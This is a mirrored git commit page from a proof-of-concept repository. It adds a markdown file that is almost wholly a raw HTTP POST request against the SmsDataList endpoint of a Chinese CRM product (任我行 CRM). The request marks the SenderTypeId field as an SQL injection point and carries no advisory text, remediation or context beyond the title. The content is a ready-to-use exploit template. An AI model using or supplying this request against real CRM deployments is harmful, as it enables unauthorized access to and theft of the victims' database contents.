mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 任我行 CRM SmsDataList SQL注入漏洞.md
This commit is contained in:
parent
e098995181
commit
c51ad27a76
14
任我行 CRM SmsDataList SQL注入漏洞.md
Normal file
14
任我行 CRM SmsDataList SQL注入漏洞.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
## 任我行 CRM SmsDataList SQL注入漏洞
|
||||||
|
```
|
||||||
|
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
|
||||||
|
Host:
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 170
|
||||||
|
|
||||||
|
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*
|
||||||
|
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user